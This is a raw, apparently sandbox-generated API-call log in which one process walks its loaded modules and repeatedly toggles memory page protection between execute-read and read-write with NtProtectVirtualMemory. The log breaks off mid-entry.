[0081.612] GetCurrentProcess () returned 0xffffffff [0081.612] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00d0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.612] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00d4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.612] GetCurrentProcess () returned 0xffffffff [0081.612] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00d4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.613] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0108, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.613] GetCurrentProcess () returned 0xffffffff [0081.613] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0108, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.613] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.614] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7582103c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75821000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.615] GetCurrentProcess () returned 0xffffffff [0081.615] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7582103c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75821000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.615] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75821044, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75821000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.615] GetCurrentProcess () returned 0xffffffff [0081.615] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75821044, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75821000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.616] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.616] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc10d8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.617] GetCurrentProcess () returned 0xffffffff [0081.617] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc10d8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.617] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc10e0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.617] GetCurrentProcess () returned 0xffffffff [0081.618] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc10e0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.618] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc10e4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.618] GetCurrentProcess () returned 0xffffffff [0081.618] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc10e4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.618] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc10f8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.619] GetCurrentProcess () returned 0xffffffff [0081.619] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc10f8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.619] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1130, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.621] GetCurrentProcess () returned 0xffffffff [0081.621] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1130, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.621] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1134, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.621] GetCurrentProcess () returned 0xffffffff [0081.621] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1134, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.621] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1138, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.622] GetCurrentProcess () returned 0xffffffff [0081.622] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1138, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.622] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc113c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.622] GetCurrentProcess () returned 0xffffffff [0081.623] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc113c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.623] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1164, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.623] GetCurrentProcess () returned 0xffffffff [0081.623] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1164, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.623] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1180, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.624] GetCurrentProcess () returned 0xffffffff [0081.624] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1180, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.624] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1184, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.625] GetCurrentProcess () returned 0xffffffff [0081.625] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1184, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.625] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1188, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.625] GetCurrentProcess () returned 0xffffffff [0081.625] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1188, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.625] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1190, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.626] GetCurrentProcess () returned 0xffffffff [0081.626] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1190, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.626] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc119c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.626] GetCurrentProcess () returned 0xffffffff [0081.626] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc119c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.627] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.628] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc10b8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.628] GetCurrentProcess () returned 0xffffffff [0081.628] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc10b8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.628] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc10f4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.629] GetCurrentProcess () returned 0xffffffff [0081.629] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc10f4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.629] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc1100, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.629] GetCurrentProcess () returned 0xffffffff [0081.629] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc1100, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.630] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc111c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.630] GetCurrentProcess () returned 0xffffffff [0081.630] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc111c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.630] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc1128, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.631] GetCurrentProcess () returned 0xffffffff [0081.631] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc1128, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.631] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc122c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.631] GetCurrentProcess () returned 0xffffffff [0081.631] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc122c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.632] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc1244, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.632] GetCurrentProcess () returned 0xffffffff [0081.632] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76dc1244, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76dc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.632] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.633] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41520, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.633] GetCurrentProcess () returned 0xffffffff [0081.634] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41520, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.634] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41540, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.634] GetCurrentProcess () returned 0xffffffff [0081.634] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41540, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.634] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4175c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.635] GetCurrentProcess () returned 0xffffffff [0081.635] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4175c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.636] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41768, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.636] GetCurrentProcess () returned 0xffffffff [0081.636] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f41768, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.636] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4176c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.637] GetCurrentProcess () returned 0xffffffff [0081.637] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4176c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.637] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417b8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.637] GetCurrentProcess () returned 0xffffffff [0081.637] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417b8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.637] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417bc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.638] GetCurrentProcess () returned 0xffffffff [0081.638] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417bc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.638] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417c0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.638] GetCurrentProcess () returned 0xffffffff [0081.639] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417c0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.639] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417c8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.639] GetCurrentProcess () returned 0xffffffff [0081.639] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417c8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.639] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417d0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.640] GetCurrentProcess () returned 0xffffffff [0081.640] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417d0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.640] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417f0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.640] GetCurrentProcess () returned 0xffffffff [0081.640] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f417f0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.641] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4180c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.641] GetCurrentProcess () returned 0xffffffff [0081.641] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4180c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x76f41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.641] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x76f4182c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: 